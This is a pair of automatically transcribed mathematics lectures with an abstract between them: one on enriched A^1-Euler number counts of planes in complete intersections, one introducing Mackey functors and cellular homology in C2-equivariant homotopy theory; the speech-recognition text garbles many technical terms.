to make so ec for a Euler number of of complex points minus um 2d minus 1 factorial factorial over 2 times the cyberbolic form um so here uh 2d minus 1 uh factorial factorial is 2d minus 1 times 2d minus 3 times 1 and uh it's okay as a field um with with characteristic uh primed it to and times 2d minus 1 um and ec is the normal topological Euler number of the the complex points of c um uh steven mckin gave a enrichment of bazoo's theorem along with geometric interpretations of local indices and that gives the calculation of um vector bundles sort of counting points on p m that's just p n um the multiple of h and uh subrino pally also along with uh uh interesting geometric 
interpretations um uh re does the cubic surface and does the quintic threefold with um a theory of dynamic um intersections uh you can hear her talk about this at motive and motives and um and whatnot um coming soon um so we have uh enriched counts of of airplanes um let's uh formalize this notation ec so let's let um it's on july 29th thank you um so uh let's let ec be this uh Euler number of the complex points and er um be the Euler number of the real points and um uh a theorem i'd like to to talk about from this paper is um the the the enriched count is the sum of ones and minus ones that you would get from the from the real and and complex point counts so let's let um r be a ring with uh one half um uh in r let and you can also do just a field of characteristic two um we'll consider the vector bundle we started with um the sum of uh the di symmetric power of the dual tautological over um um uh the gross monion and let's let it be relatively um oriented with dimension of the uh the rank of the is the dimension of the gross monion um and uh so this has uh we can we can rewrite this in terms of parity conditions and sum conditions so i.e. we want the sum of di over r plus one uh di plus r choose r plus n plus one congruent to zero um mod two and the dimension equaling the rank uh dimension of gross monion r plus one times n minus r is the the rank di plus r choose r um uh and so uh then these vector bundles that we were interested in um the the Euler number is ec plus er over two times one plus ec minus er over two uh uh times times negative one um and for example we can get an enriched count of three planes on a generic seven-dimensional cubic hyper surface so there are 160 839 one plus 160 650 minus one three planes in a seven-dimensional um cubic um hyper surface and uh as uh to put this back in terms of um accounting r planes if we take the sum over the r planes we'll call the r plane p in our complete intersection x of the this trace we know it's for a separable field extension by de barre manatelle of the jacobian we express um our our function sigma in terms of local coordinates and takes some derivatives then this is um uh the the same the same number up here um and while uh the number on the right hand side uh is uh some ones and some minus ones these these are not in general sums of ones and minus ones um they just have to sum to them uh uh and as suggested by the title uh this is proven uh with an integrality result the count of the lines on x reduced to a bundle on a grass manian that was defined over z it's the section that is defined over the interesting equations of x and that's why the um the left hand side here has all sorts of interesting summands and um the the right hand side picks up the fact that the brass manian is defined over z um so uh uh theorem two this is all joint with tom bachma um uh so let's let um the over y be a relatively uh oriented vector bundle with v and y defined over um z a join one over d factorial and d is greater than or equal to to to two um uh with y smooth and proper sm for smooth and proper over the same base um then the uh Euler number has to be in the subring uh uh generated by minus one and um the two three all the way up to d inside g w of k um and uh in the case of d equals two this leaves two possibilities so then either um e of v is the the quantity i think maybe i'll still be able to paste it this this quantity here um or uh it's what we get by um putting in a single two but but keeping keeping the the signature the same um uh so um 
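Since the enriched count determines, and is determined by, the pair (e_C, e_R), the quoted numbers can be unpacked by simple arithmetic; I write \(\mathcal{V}\) for the bundle in question, and the identification with the classical counts in the last line is my gloss.

\[ e(\mathcal{V}) \;=\; \frac{e_{\mathbb{C}}+e_{\mathbb{R}}}{2}\,\langle 1\rangle \;+\; \frac{e_{\mathbb{C}}-e_{\mathbb{R}}}{2}\,\langle -1\rangle. \]
\[ \text{3-planes on a 7-dimensional cubic: } \tfrac{e_{\mathbb{C}}+e_{\mathbb{R}}}{2}=160{,}839,\ \ \tfrac{e_{\mathbb{C}}-e_{\mathbb{R}}}{2}=160{,}650 \ \Longrightarrow\ e_{\mathbb{C}}=321{,}489,\ \ e_{\mathbb{R}}=189. \]
\[ \text{Lines on a cubic surface: } 15\langle 1\rangle+12\langle -1\rangle \ \Longrightarrow\ e_{\mathbb{C}}=27,\ \ e_{\mathbb{R}}=3, \]

matching the classical 27 complex lines and the signed count of real lines.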
uh we can distinguish between these um possibilities uh by uh taking uh an Euler number over some single prime where where two two is not a square and in order to to prove um the result about the symmetric powers um we use a characteristic class uh argument to get rid of this uh this second this second possibility um uh um the the characteristic class argument owes uh a lot to marco v and spit value characteristic classes um uh this would be a good time to to pause for for questions are there any any all right um so uh theorem two um is proven by using an an Euler class for good SL oriented theory um for example k o and uh the uh the d greater than or equal to two restriction comes from uh comes from wanting to use k o and there is um currently uh a collaboration on uh k o without inverting two um with uh Baptiste uh Calmez Emmanuel Dotto Yonatan Harpas um Fabian Habistrate uh Marcus Land Christian Moy Dennis Nardin Thomas Nicolaus Wolfgang Sturm and um Marcus Spitzveck um I understand also has work around this let's let's put that let's put Marcus Spitzveck um here too um uh so my understanding is that um that uh it is expected that um they will show that uh if you take k theory what let's call that uh kgl and taking a vector space to its dual gives a c2 action and you can take a a homotopy fixed points um of uh c2 and it's expected that the um uh if you if you make a substitute for Hermitian k theory by taking the homotopy fixed points of kgl and completing it too that it can be shown that um uh this is the growth of the group of z uh completed at two so this exists over at z so it exists over z um it's uh SL oriented and there's a um you can read about it in a paper of Bachman and Mike Hopkins um and while it doesn't respect base change it does have some maps and so this is sufficient the um to show the same integrality statement for d equals one to show um the integrality result theorem two um for d equals one um uh because the the Euler number with respect if we let this this gadget be k o prime um then the Euler number with respect to k o prime it's um it's here and there is enough functoriality so that we'll have to map to the if we pull back to z um joining one half to k o prime it'll it'll map to the corresponding number um moreover there there's a map from k o to k o prime um giving that the uh Euler number when k o exists over one half maps here too and the um uh since these two elements map to um uh the same element in there um they determine an element of this of the fiber product of g w z one half g w z completed at two um over g w z one half completed at two and this is g w of z um so uh the the we get the stronger integrality result um uh with with with that work uh in the spirit of a summer school i'd like to end with some open problems uh the uh the zero if open problem is can be expressed somewhat facetiously like this i there are a lot of um uh great results uh um in uh uh isan bud harris's uh 32 64 and all that or fulton's intersection theory um that uh give interesting enumerators results and um uh there are beautiful enumerative results having deep connections to uh uh many areas of mathematics so the zero if problem is can a one homotopy theory enrich enrich them uh so take a problem from isan bud harris 32 64 and all that fulton intersection theory let's give more of a preamble to this question um so um there are beautiful results in a one enumerative uh an enumerative geometry can a one homotopy theory enrich them and enumerative geometry uh can a one homotopy 
theory enrich them uh i don't think i wrote down um to uh taken um uh somewhat haphazardly from uh isan bud harris and i don't have time to write them down but let me just just read to so that we're on the same page about um the uh what what question zero is is trying to suggest so uh let v1 through v2n be general tangent vector fields in pn and how many points of pn is there a cotangent vector annihilated by all of them and uh another one is given four curves c1 c2 c3 c4 and p3 up degrees d1 d2 d3 d4 how many lines meet general translates of all four i'll add these to the notes and and put them in um uh to be less um hand wavy about this um in the corollary above we didn't have the analog of um the uh of interesting descriptions in terms of the the complete intersection itself so geometric interpretation in terms of x um they're the very concrete uh examples of this uh um for this jacobian which is sort of living on the on the um on the moduli space so beyond uh cubic surface quantic threefold the zoo um to connect up with marco rubolo's talk the um the the hock shield homology of that matrix factorization algebra that showed up it has a pairing on it and that pairing is the a1 millner number of the singularity and element of the the growth indeed bit group but there's also inside this um k-naught of varieties this cut and paste relation there's this motivic uh millner fiber and a compactly supported a1 Euler characteristic that mark levine uh told us about um so uh these this this should be all all equal um and uh uh the list should continue um the you you lose uh certain tools and you gain others for example and then yes he's um beautiful splitting principle uh the multiplicativity of Euler numbers and exact sequences is no longer nearly as useful because you really can't divide but the kazoo interpretation of Euler numbers gives you some control and exact sequences but in general it's hard so um are there better are there are there better tools uh there there is really structure here and an arithmetic information um that that lies away from c and what is it um i'll stop there thank you kirsten for a wonderful talk so um let's hear some questions and maybe i can ask by um by asking you if there's some connection between your work and oriented shoeboard calculus uh for other so matias vent um uh absolutely um so uh matias vent has information on the oriented chow of um uh gross monions in in terms of uh some generalizations of of shoeboard calculus and that gives uh other interesting ways to um to compute um these Euler numbers it doesn't directly use it but um that there is uh interesting things to be said about that okay great i have a question um from my face and so this last this last question the a1 milner number equals the um Euler characteristic of the notific milner fiber you said the left hand side comes from um a pairing on hoxhaw's homology can you say a little bit more about that um yeah um so um the i think maybe the um a better way to start with what the a1 milner number is is if um if you have a point p of f equals zero the a1 milner number um if this p is a singularity is um is can be defined to be this this local degree at p of the gradient of f but then this is also the hoxhaw homology of this matrix factorizations um uh uh for for f um and that's by explicitly marco told us that this was the jacobian ring um and uh this this local degree can be computed as the jacobian ring and this can be computed as the jacobian ring and the pairing on hoxhaw's homology is uh is the 
same so we get we get this equality here so this one wouldn't be part of the problem and then this one um uh i think is open what what what pairing is there on hoxhaw's homology uh great so um uh litman and uh uh um i'm blanking um so uh there's there's even a six-funker formalism uh in in hoxhaw's homology and it it's a way of expressing things about coherent duality in terms of of hoxhaw homology and um i am embarrassingly blanking on on the important names involved and in constructing that pairing um uh but it's also uh in in this context we wrote it down in the the women in topology group um to uh yeah great so and you're too young to be blanking on these things thanks i appreciate that okay and there's a nice question in the q and a if you're still gonna see that um yes so um uh the so for uh over a finite field um uh the three planes that um give you a square so over a finite field we had um um uh we have we have this um this growth indeed big group and um so in particular we're going to have a parity condition coming from uh three planes associated to um square or non-square local um local contributions and uh if you if you sum all of those non-square over odd degree field extensions with the square ones over even degree field extensions you'll have to get an even number of those and over things like cubic surface this corresponds to the difference between hyperbolic and elliptic lines um and if you come up with uh a sort of intrinsic to the complete intersection definition of what it means for this discriminant to be square or non-square or more generally what that Jacobian means then you get a concrete um uh uh totally independent of any um of any a1 homotopy theory restriction on on that complete intersection but even in terms of the Jacobian we get this this even parity condition so um by motivic by a1 Milner number um uh we met the left hand side and then by the motivic Milner fiber um uh I meant the um the construction uh that gives you this element of of canada varieties um with this motivic integration um uh so it's a yes uh um uh the construction um the construction is a little involved um uh uh the way I've seen it doesn't directly use I use nearby cycles functors but I wouldn't be surprised if if that's um uh my not knowing how to how to show the two are are closely related okay great then I have another question because in this homotopy limit problem you're completing at two is that uh so so you don't don't expect that we need to complete with respect to the huff map a down so just um um uh as far as I know but I think Tom would be the the better person to um to answer this question okay then and then the qna there's another question um yes yeah this yes this is the um thank you so cast Jesse Leo cast um and I did work on on on a1 Milner numbers thank you Stephen okay great any other questions I don't think so so thanks again Kirsten for a wonderful talk and see you all again tomorrow we start 1 p.m. Paris time
|
A^1-Euler numbers can be constructed with Hochschild homology, self-duality of Koszul complexes, pushforwards in SL_c oriented cohomology theories, and sums of local degrees. We show an integrality result for A^1-Euler numbers and apply this to the enumeration of d-planes in complete intersections. Classically such counts are valid over the complex numbers and sometimes extended to the real numbers. A^1-homotopy theory allows one to perform counts over arbitrary fields, and records information about the arithmetic and geometry of the solutions with bilinear forms. For example, it then follows from work of Finashin–Kharlamov that there are 160,839⟨1⟩ + 160,650⟨-1⟩ 3-planes in any 7-dimensional cubic hypersurface when these 3-planes are counted with an appropriate weight. This is joint work with Tom Bachmann.
|
10.5446/50928 (DOI)
|
Thank you. Thank you very much for the invitation to speak. I'm really excited to be able to participate, albeit remotely. I'm glad that that worked out. Less glad that it had to work out, kind of wishing that the coronavirus were better under control, especially here in the US. But yeah, since I'm given the last talk, I get to also say I think we should thank the organizers. They've done a wonderful job taking an in-person conference and very quickly turning it into a great online conference. So please join me, I guess, somehow. Yeah, thank you, Ian. And great job. Guys, this is seriously fantastic. And I know it was a lot of work. So thank you very much. Okay, so as I said, I'm going to talk about techniques of computation in Equivariant and then some in Motivicomotopy, trying to hit on as many of the key words from that title of the conference as possible. I'm aiming this to be more introductory than sort of the research side. And please do, if you have questions, ask away. And I'll try to answer them as we go through. Most of my focus in the talk is going to be on the Equivariant computations. A lot of them for everyone's maybe second favorite group, the group with two elements. And the reason I'm going to be focusing on this one is, well, several fold. First, the group with two elements, which I'll call C2 from now on, is the Galois group, the complex numbers over the reels. This ties it to a lot of geometric and algebrao geometric concepts. Namely, if I want to talk about, say, descent for real vector bundles, it's the same thing as understanding a complex vector bundle together with this descent data of a C2 action. Second, a lot of classical and chromatic computations can be seen in this C2 Equivariant story. And actually, I know that that you all saw Dan Isaacson's series of talks earlier in the conference where he talked a lot about the connections between motivic over R, motivic over C, C2 Equivariant Homo Tope, and classical Homo Tope. So I'll pick up on some of those themes as well. And then finally, and this one really I should have led with, because in some ways it's the most important from my perspective, we can actually do computations here. A lot of the literature about Equivariant Homo Tope theory tends to suggest that computations are essentially impossible. Some of which go so far as to say it's impossible to do some of these. I don't find that to be the case. And I hope that by the end of my talk, you agree that a lot of these computations are much more doable than you may have thought initially. Okay, so I'm going to start by just saying that we're going to be working in the following context. There we go, lost my bit of a spell. I'm going to be working for working in what people sometimes call genuine Equivariant Homo Tope. Okay. Now, I hate the word genuine here. It's for two reasons. It's very value laden, especially when you compare it to the contrast. We will talk about naive Equivariant or genuine Equivariant. There's a distinct hierarchy established there, and it's not actually supported in the math. So what I would advocate for, and I hope I can start to get traction in this, is not to call this genuine, but rather to call it something instead like complete. And the complete here means that we have all transfers. And this is a theme that I'm going to spend a little bit of time talking about as we go forward. But before I do that, I'm actually going to start with just a little bit of a review. 
So how do we talk about computations and where do the invariants live? So how do we understand Homo Tope groups? G-Spectra and G-Spaces. And Dan also talked about... Sorry, there is a comment by Yuri Suleyma. He says that one version of G-Spectra is often called Borrel Complete. Yeah, that's true. I don't understand the frowny face there, Yuri. It is the case that the homotopically meaningful version of naive G-Spectra is Borrel Spectra. And here, we don't necessarily have transfers. These are things where we sort of free up the action historically. And I guess the not having transfers is probably why you had the frowny face. So I'm with you on that one. So in the equivariate context, the first thing that I run into is I can't get away from thinking about homotopy sheaves instead of homotopy groups. And of course, the real way we should be doing algebraic topology and sort of this ideal world where we have complete control over everything is I would be able to just immediately tell you what maps out of any, say, finite CW complex were. I'd love to be able to tell you what maps out of any finite CW complex are. We approximate this instead by restricting attention to maps out of the building blocks of finite CW complexes, namely spheres. I'm going to do the same thing for G-Spaces or G-Spectra. So we'll consider, we'll look at, at the functors. And these are functors from the category, which I'll call, fin G, op, into say, abelian groups. And this fin G op, this is the category of finite G sets. And equivariate maps. And I'm going to do this just via the Yoneda lemma. And so the ones I'm going to care about are, I'm going to take equivariate homotopy classes of maps from, oops, I'm describing a functor, from T plus, so T together with the district base point, smashed with the n-sphere, into some fixed G-Spectrum E. And my superscript G here is just reminding myself that I'm taking the collection of equivariate maps. This is, this is a contrivariate functor as written because I'm mapping out of the T plus slot. And so in particular, it fits into this form. And this is what I'm called the homotopy coefficient system. Already, I'm suggesting a way that I should be thinking about my G-CW complexes. The CW complexes I'm going to build, not just out of spheres with a trivial action, but rather out of spheres, again with a trivial action, but I allow myself to take disjoint unions of these and to permute the copies of the spheres in those stacks. And that's how the group is going to be acting. So I can map out of this and this amounts to picking out maps from spheres into various fixed points. So the first thing to notice is that if I have a disjoint union of things, so T, disjoint union T prime, and then I take the disjoint base point and smash this with the n-sphere, map this into E, then the inclusions of T and T prime into the disjoint union give me a pair of maps backwards. And so I get a decomposition like this. So in other words, my functor from finite G sets op into abelian groups isn't any old functor, it's one that takes the disjoint union, which is the co-product in finite G sets, which makes it the product in finite G sets op to the product in abelian groups. So in other words, this construction gives me a product preserving functor. And I want to stress here that I'm in the algebraic context, so saying that I'm a product preserving functor is a property of the functor rather than additional structure. 
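A compact LaTeX restatement of the homotopy coefficient system just described; the underline notation is the standard one, added here by me rather than taken verbatim from the talk.

\[ \underline{\pi}_{n}(E)(T) \;=\; \big[\, T_{+}\wedge S^{n},\ E \,\big]^{G}, \qquad T \in \mathrm{Fin}_{G}, \]
\[ \underline{\pi}_{n}(E)(T\sqcup T') \;\cong\; \underline{\pi}_{n}(E)(T)\times\underline{\pi}_{n}(E)(T'), \]

so that \(\underline{\pi}_{n}(E)\) is a product-preserving functor \(\mathrm{Fin}_{G}^{\mathrm{op}}\to\mathrm{Ab}\).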
Well any G set has an orbit decomposition, so this functor, slot plus smash Sn into E, E is determined by the values on orbits, by which I mean transitive G sets. So G mod H, as H varies over the subgroups. And if you haven't seen this before, then I would suggest that you spend a little bit of time thinking about what's the geometric content maps out of G mod H, equivariate maps out of G mod H into some G space. And you can start to see the interplay between fixed points for various subgroups and then G itself. Okay, now this is the kind of thing that I didn't need to be working in G spectra yet. I could have made sense of this in G spaces, provided N was at least two. And if I'm in G spectra, any kind of G spectra, be it the Burrell ones that Yuri brought up, be it the complete ones that I'll be working in, or anything in between, I still have these homotopy coefficient systems. The key feature of the complete equivariate homotopy is that I have not only these contravariant restriction maps, but also the covariant transfer maps. So I'm going to define a category, the Burnside category, of G has objects, finite G sets, and the morphisms, so home in the Burnside category from S to T is going to be, well, I'll be a little glib here and just put parenthetically the group completion of the set of correspondences, S and T. So here I have two equivariate maps, F and G, and then I'm doing this up to isomorphism. So again, I'm going to be working in an algebraic context, so I'm working up to isomorphism. As you know from Clark's work or Angelica's, then I could have instead considered an enrichment of this, be it one where I have a two category, and instead of considering this up to isomorphism, I remember the isomorphisms as the two categorical part of the data, or an infinity category where I build much larger diagrams, again recording isomorphisms and various pullback conditions. Oh, and I should say, if I'm going to say that I have a category, I need to say what the composition law is, and composition is via pullback. So given two correspondences, then I can pull them back, and I get another correspondence. Okay, so in this category, since the category is the same as the category of, excuse me, the objects are the same as the category of finite g sets, I can still talk about things like district union and Cartesian product. In this category, though, well, the Burnside category, it's canonically self-dual. And by canonically, I mean, it's the identity on objects. And then I just observe that I have my correspondence, which has, you know, that maps in two different directions. And that's just a sort of an artifact of the way I'm writing. I'm choosing to read from left to right, because that's the only way I know how to read English. But I could have instead swapped it and gone from right to left. Then I would be seeing instead harm from as written right here, that would be the same thing as harm from T to S. So A is, oh, I should have given this name. Sorry, script A. So A is canonically self-dual. And the district union is now both the product and the coproduct. And if you haven't spent any time working with this category or sort of thinking through what this might look like, I would suggest seeing for yourself how the district union could possibly be the product. In other words, C, how do I write down maps in the Burnside category from T, district union, T prime, back to T and back to T prime? Whereas in general, I'm not going to have those maps just in finite g sets. 
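In symbols, the mapping groups and the composition rule just described, writing spans left to right as in the talk; the name \(\mathcal{A}_{G}\) for the Burnside category is my shorthand.

\[ \mathrm{Hom}_{\mathcal{A}_{G}}(S,T) \;=\; \Big(\big\{\, S \leftarrow U \rightarrow T \,\big\}\big/\!\cong\Big)^{\mathrm{gp}}, \]
\[ \big(T \leftarrow V \rightarrow R\big)\circ\big(S \leftarrow U \rightarrow T\big) \;=\; \big(S \leftarrow U\times_{T}V \rightarrow R\big), \]

and swapping the two legs of a span gives the canonical identification \(\mathrm{Hom}_{\mathcal{A}_{G}}(S,T)\cong\mathrm{Hom}_{\mathcal{A}_{G}}(T,S)\), the self-duality mentioned above.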
So the players in the equivariant context, in this complete one, are Mackey functors. A Mackey functor is, again, a product-preserving functor from the Burnside category into abelian groups. And I'm always going to indicate my Mackey functors with an underline, so there's a little bit of type checking to contrast them with abelian groups. Again, any G-set can be decomposed into orbits, and if I use that orbit decomposition, I get that a Mackey functor is determined by a much smaller amount of data. So let me spell that out for G = C_p, and I'm going to choose a generator of C_p, say gamma. A C_p-Mackey functor is the following data. First, an abelian group M(C_p/C_p), which is M of a point. Second, a C_p-module M(C_p). And third, maps: a restriction, which goes from M of a point to M(C_p), and a transfer, from M(C_p) to M of a point. I'll often write this as a little diagram that people call a Lewis diagram, after Gaunce Lewis: the restriction goes down, the transfer goes up, and then I have the action of my group C_p on the C_p-module. And then you satisfy a few axioms. First, the restriction lands in the C_p-fixed points, and the transfer factors through the coinvariants. Second, there is a condition called the Mackey double coset formula, which says that the composite of the transfer followed by the restriction is the sum over the elements of the group acting on M(C_p), which is sometimes called the trace if you use the Galois theory names. Okay, so that's it. And how am I supposed to connect these two descriptions? How am I supposed to see this as something coming from the Burnside category? Well, remember that in the category of finite C_p-sets I have a map from C_p to a point, the crush-everything map, and I have a map from C_p to itself which is multiplication by gamma, and these fit into a little commutative diagram because the point is terminal. Now, I can embed the category of finite G-sets covariantly, as the forward-direction maps in the Burnside category, or contravariantly, as the backwards maps. If I embed it contravariantly, the quotient map gives me my restriction map; if I embed it covariantly, it gives me the transfer map. So both the restriction and the transfer arise from this quotient map from C_p to a point. And the first conditions, the one about the image of the restriction landing in the fixed points, or the transfer factoring through the orbits, are exactly summed up in the commutativity of that little triangle, so it's really just a functoriality condition. And finally, the Mackey double coset condition is what you see if you pull back C_p over a point with C_p over a point: the pullback is C_p x C_p, and when I write that in terms of C_p-sets, breaking it up into its orbit decomposition, I get exactly this condition. Okay, let me make it a little more concrete, because I will actually do a couple of computations later and I want to be able to use these. There's the representable functor, the Burnside Mackey functor. The value at a point is Z direct sum Z, and the value at C_p is Z. The restriction and transfer maps I'll just write as little matrices: the restriction sends the first generator to 1 and the second to p, and the transfer is (0, 1).
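Here is that C_p data in one display; the layout and basis choices are mine, but the formulas are exactly the ones just stated.
\[
\underline{M}:\qquad M(C_p/C_p)\ \xrightarrow{\ \mathrm{res}\ }\ M(C_p/e)\ \xrightarrow{\ \mathrm{tr}\ }\ M(C_p/C_p),
\qquad
\mathrm{res}\circ\mathrm{tr} \;=\; \sum_{i=0}^{p-1}\gamma^{\,i},
\qquad
\operatorname{im}(\mathrm{res})\subseteq M(C_p/e)^{C_p},
\qquad
\mathrm{tr}\circ\gamma=\mathrm{tr}.
\]
For the Burnside Mackey functor \(\underline{A}\) of \(C_p\), with basis \([C_p/C_p],[C_p]\) at the fixed level:
\[
\underline{A}(C_p/C_p)=\mathbb{Z}\oplus\mathbb{Z},\qquad
\underline{A}(C_p/e)=\mathbb{Z},\qquad
\mathrm{res}=\begin{pmatrix}1 & p\end{pmatrix},\qquad
\mathrm{tr}=\begin{pmatrix}0\\ 1\end{pmatrix},
\]
with \(\gamma\) acting trivially at the underlying level.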
The vial action here is just by the identity. So as I said, this is actually the functor I get by mapping out of a point in the Burnside category. Again, this is product preserving because Dissert Union was the product. And so it's literally the universal property of the product to say that HOM out of a point is product preserving. Okay, if you've also seen the Burnside ring, the Burnside ring is the Grotendieck group of finite g sets. So I should also be able to connect these two summands to finite g sets. And I can, this summand is the g set point and the district union of copies of point. And this one is the g set cp as a cp set. And every cp set breaks up into a district union of points and cp. And then my restriction map is just forget the cp action and just remember the set. And that takes point to a set with one element, and it takes cp to a set with p elements and that was this map. Okay, so the other that I want is the constant Mach-e-funkter z. And this one is the value at point is z. The value at the at cp is also z. The restriction map is the identity, the vial group. Oops, sorry. Vial group action is also the identity. And then that forces the transfer to be multiplication by p. Because since the restriction is injective, then I can compute the transfer by computing the composite of the restriction with the transfer. And I see I have no choice here. These two Mach-e-funkters are pretty closely connected. The target is what sometimes called a cohomological Mach-e-funkter. Now, this one, I should pause and connect this already to what we see in the motivic story. Often when we talk about pre-sheaves with transfers in motivic homotopy, we're referring to things like this that are close to cohomologic Mach-e-funkters. And there I see the same kind of condition that the composite of the transfer and the restriction is multiplication by the index of the group. And that's the condition that I'm writing down here. In equivariant homotopy, we allow these more general kinds of transfers, which you should think of as actually also showing up in the motivic context. This is analogous to the transfer along, say, a finite etal map. Okay. So before I continue, questions about this so far. I know a lot of this is review, but that doesn't mean the questions won't have come up. You said A underline is a Bernstein Mach-e-funkter. Yes. That's my name. Yes. Okay. And it's the usual thing in math where proper names become adjectives. And so you end up with long strings. So Sean asks why cohomological? Is this an important distinction? These do show up a lot. And they're the kinds of Mach-e-funkters that you see with group cohomology. And that's one of the reasons why I might describe them that way. So from that perspective, it is a very natural class of Mach-e-funkters that arises. And so there's been a lot of work in this. For us, the constant Mach-e-funkter Z is a fairly easy one to do computations with, as I'll show you in just a minute. And it also arises naturally in the equivariate context. Yes. Group cohomology does take values in these. Group cohomology naturally has an extension to a Mach-e-funkter. And when I do group cohomology, I consider it in one of these contexts. And they're always coming from modules. It's always something that's a module over the constant Mach-e-funkter Z. No. Thanks for asking. Okay. So the reason that we talk about Mach-e-funkters in equivariate homotopy is that Mach-e-funkters play the role of abelian groups. So in genuine G-spectra. 
In other words, all of our usual algebraic invariance are actually Mach-e-funkter valued. So for example, normally I might talk about homotopy groups of a spectrum. And in the equivariate context, I have the homotopy Mach-e-funkters, an equivariate spectrum. I can talk about the generalized cohomology theory's value on a space or spectrum. And in the equivariate context, I have a Mach-e-funkter's worth of the cohomology of X in some E theory. So I have a richer structure that I could be working with. For those who might worry or wonder about such things, the category of Mach-e-funkters is an abelian category. We have enough projectives and injectives so we can do homological algebra the way we normally would. And then in a little bit, I'll also talk about how the category of Mach-e-funkters has a symmetric minoidal product. So we're really exactly like with abelian groups as reflecting what we saw in spectra, we build a model in DG abelian groups. We can do the same thing in equivariate spectra. We take equivariate spectra and we compare it to DG Mach-e-funkters or DGAs in Mach-e-funkters. So one of the things that I want to be able to do is talk about ordinary homology. And I find it easier when I'm talking about ordinary homology to just show you how to compute this in some examples. So how do we compute homology? And remember this is supposed to be a Mach-e-funkter, but I'll just tell you the value of this at some point with coefficients in something. And now just for simplicity for myself, I'll start at this point switching to the group being C2. So had I planned, I had to use some of the newer technology, I would ask via a poll, what's your favorite way to compute ordinary homology? You know, it's like we would do in a calculus class, do like a quick spot check. But if I were to do that, I would guess, I would guess you would say cellular as opposed to singular. Although singular is certainly nice for sort of formal reasons. Yeah, thank you. And yeah, cellular is the way that we actually can compute things easily. We write down a small chain complex to do it. So let's do that here. And let's start with an example. So we'll just do this via cellular homology. And my example is going to be, let's look at a representation sphere. So I'm going to take S to the C, by which I mean the one point compactification of C. And then C, remember I said earlier, my C2 is also the Galois group of C over R. And so this naturally has an action of C2 as the Galois action. So if I were to draw this, well, this is the Riemann sphere. So I have the real line sitting inside the Riemann sphere. And then I have the two hemispheres. And here was my S to the R sitting as the equator. And S to the R, well, this is just S1. And when I think of the two hemispheres in my Riemann sphere, well, I could put them in as showing up. And actually, I'm doing a different projection than you're probably thinking of. I'm going to have the positive complex part being the upper hemisphere, excuse me, the positive imaginary part being the upper hemisphere and the negative imaginary part being the lower hemisphere. So my group acts by swapping the two hemispheres and leaving the equator fixed. So I can build this as an equivalent cell complex. I have two copies of the one sphere, and they're swapped. So I'm going to have a C2 cross S1, because that's two copies of the one sphere. I'll draw a cartoon as I go through. It's my one sphere and my one sphere. And they should have been the same. And the group acts by swapping them. 
So this is C2 cross S1. And I'm going to map this to the one sphere where I just fold them down. So it's via the identity. It's a twisted version of the fold map. And then I can include these into the corresponding C2 cross disks. And that amounts to just putting in a little disk on each of these. And when I pushed this out, so actually let me, let me do it this way. Oops. Too much. When I push this out, now I've exactly built my Riemann sphere with the two hemispheres that are swapped. So here's my cell structure. And if I want to take the cellular homology, well, what I need to do is figure out what am I supposed to do when I evaluate what's the homology of one of these g mod h cross a sphere or g mod h plus smash a sphere. So the building block is I'm going to take the homology hn of, whoops, also h star of g mod h cross an n sphere with coefficients in some Mach-E functor m. Well, this is going to be, I'll do reduced. This is 0 if star is not n. And it's just evaluate m at g mod h if star equals n. Now I can start to write down what, what my homology is going to look like. Notice that this map here, this one, this is the same thing as c2 to a point crossed with the one sphere. And remember, my Mach-E functors are exactly built so that they know what I'm supposed to do to maps between orbits. So a map c2 to a point, this is something that I can evaluate my Mach-E functor on. Now I can write down that chain complex using that. So in degree zero, again, I'm doing the reduced theory. I have nothing. Here's my degree. In degree one, well, I had my one cell, there's only one one cell and it's the one sphere. So I have m of a point. And in degree two, I had a single equivariate two cell. It was the one coming from m of c2. And the cellular boundary map is just m of c2 going to a point. So notice this is the covariate version of this. So this is the transfer from m of c2 to m of a point. And this tells me how I can write down this homology for any of these. So I get h1 is the co-kernel of the transfer. And h2 is the kernel of the transfer. And it's a little more work. You can get these as instead Mach-E value to things. It amounts to thinking about g mod h and putting in another slot where I crossed with some fixed t. Okay. So since this is a talk in the broader context of a summer school, maybe I'll say as an exercise for you. Oops. As an exercise, figure out the homology groups of s, k times c with coefficients in any Mach-E functor m for all k and m. You can use the same idea that I talked about here. You have to think a little bit about what happens in the co-homology version. So namely when k is negative. But it's fun to work through. Okay. There's one other thing that I want to point out here. And that's actually right here. I am going to give a name to this map from s1 into this c sphere. I'm going to call this a sub sigma. I'm going to call this sometimes the Euler class of the sine representation. And if I'm being super pedantic, I'd actually call this the suspension a sigma. Because a sigma is a map from the zero sphere into now instead, it's just the one point compactification of the imaginary axis in c where that's swapped. Because, well, we know how complex conjugation works. And here I'm seeing this co-fiber sequence. c2 goes to the zero sphere or c2 plus goes to the zero sphere. And the co-fiber is the sine sphere. And this whole part that I'm writing down in this case is the suspension of that co-fiber sequence. So it's something to keep in mind. All right. 
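To make the recipe above concrete, here is the reduced cellular chain complex of Mackey functors for \(S^{\mathbb{C}}\), evaluated at the fixed-point level \(C_2/C_2\) only (the full Mackey-functor-valued answer needs the crossed version mentioned above), together with what the stated formula gives for the two example coefficient systems.
\[
0 \longrightarrow \underline{M}(C_2) \xrightarrow{\ \mathrm{tr}\ } \underline{M}(\mathrm{pt}) \longrightarrow 0
\quad(\text{degrees }2,1),
\qquad
\widetilde H_2 = \ker(\mathrm{tr}),\qquad \widetilde H_1 = \operatorname{coker}(\mathrm{tr}).
\]
For \(\underline{M}=\underline{\mathbb{Z}}\) the transfer is multiplication by 2, so \(\widetilde H_2(S^{\mathbb{C}};\underline{\mathbb{Z}})(C_2/C_2)=0\) and \(\widetilde H_1(S^{\mathbb{C}};\underline{\mathbb{Z}})(C_2/C_2)=\mathbb{Z}/2\); for \(\underline{M}=\underline{A}\) the transfer is \(\binom{0}{1}\), so the kernel vanishes and the cokernel is a copy of \(\mathbb{Z}\).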
